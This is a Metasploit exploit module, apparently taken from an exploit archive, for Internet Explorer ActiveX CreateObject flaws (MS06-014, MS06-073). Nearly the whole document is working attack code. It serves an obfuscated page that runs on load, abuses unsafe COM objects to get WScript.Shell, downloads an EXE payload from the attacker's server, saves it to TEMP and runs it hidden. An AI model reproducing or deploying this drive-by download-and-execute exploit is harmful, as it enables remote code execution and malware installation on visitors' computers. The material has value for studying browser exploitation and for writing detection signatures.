Internet Explorer COM CreateObject Code Execution

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Seh  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::IE,  
:javascript => true,   
:os_name => OperatingSystems::WINDOWS,  
:vuln_test => 'CreateObject',  
:classid =>   
[  
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',  
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',  
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',  
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',  
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',  
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',  
'{639F725F-1B2D-4831-A9FD-874847682010}',  
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',  
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',  
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',   
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',  
'{0006F033-0000-0000-C000-000000000046}',  
'{0006F03A-0000-0000-C000-000000000046}',  
],  
:rank => ExcellentRanking # reliable exe writer  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Internet Explorer COM CreateObject Code Execution',  
'Description' => %q{  
This module exploits a generic code execution vulnerability in Internet   
Explorer by abusing vulnerable ActiveX objects.   
},  
'License' => MSF_LICENSE,  
'Author' =>   
[   
'hdm',   
],  
'Version' => '$Revision$',  
'References' =>   
[  
[ 'MSB', 'MS06-014' ],  
[ 'MSB', 'MS06-073' ],  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
  
# Patched  
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],  
# Found in mpack  
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],  
  
# Patched  
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],  
  
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)  
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],  
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],  
  
# Visual Studio components, not marked as safe  
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],  
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],  
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],  
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],  
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],   
  
#  
# The controls below can launch the "installing component" dialogs...  
#  
  
# Not marked as safe  
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],  
  
# Not marked as safe  
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],  
  
# Found exploitable in the wild (no details)  
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],  
  
],  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
  
if (request.uri.match(/payload/))  
return if ((p = regenerate_payload(cli)) == nil)  
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)  
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })  
return  
end  
  
# Build out the HTML response page  
var_html = rand_text_alpha(rand(30)+2)  
var_func_exploit = rand_text_alpha(rand(30)+2);  
var_func_go = rand_text_alpha(rand(30)+2);  
var_func_createo = rand_text_alpha(rand(30)+2);  
var_exe_name = rand_text_alpha(rand(30)+2);  
var_objects = ''  
  
# Build the object list based on target selection  
if (target.name == 'Automatic')  
targets.each do |t|  
next if not t['CLSID']  
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","  
end  
else  
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","  
end  
  
  
content = %Q^  
<html><head><title></title>  
<script language="javascript">  
  
function #{var_func_createo}( o , n ) {  
var r = null;  
  
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}  
  
if (! r) {  
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}  
}  
  
if (! r) {  
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}  
}  
  
if (! r) {  
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}  
}  
  
if (! r) {  
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}  
}  
  
if (! r) {  
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}  
}  
  
return( r );   
}  
  
function #{var_func_go}( a ) {  
  
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );  
  
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );  
  
var e = s.Environment( "P" + "ro" + "ce" + "ss" );  
  
  
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';  
var xml = null;  
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";  
var dat;   
  
try { xml=new XMLHttpRequest(); }  
catch(e) {  
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }  
catch(e) {  
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");  
}  
}  
  
if (! xml) {  
return(0);  
}  
  
xml.open("GET", url, false);  
xml.send(null);  
dat = xml.responseBody;  
  
o.Type = 1 ;  
o.Mode = 3 ;  
o.Open ( ) ;  
o.Write ( dat ) ;  
o.SaveToFile ( bin, 2) ;   
  
s.Run ( bin , 0 );  
}  
  
function #{var_func_exploit}( ) {  
var i = 0;  
var t = new Array( #{var_objects} null );  
  
while (t[i]) {  
var a = null;  
  
if (t[i].substring(0,1) == '{') {  
a = document.createElement("object");  
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;  
} else {  
try { a = new ActiveXObject(t[i]); } catch(e){}  
}  
  
if (a) {  
try {   
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;  
if (b) {  
#{var_func_go}( a ) ;  
return(0) ;  
}  
} catch(e){  
}  
}  
i++;  
}  
}  
</script>  
</head>  
<body onload='#{var_func_exploit}()'>  
#{var_html}  
</body>  
</html>  
  
^  
  
  
content = Rex::Text.randomize_space(content)  
  
print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)   
end  
  
end  
`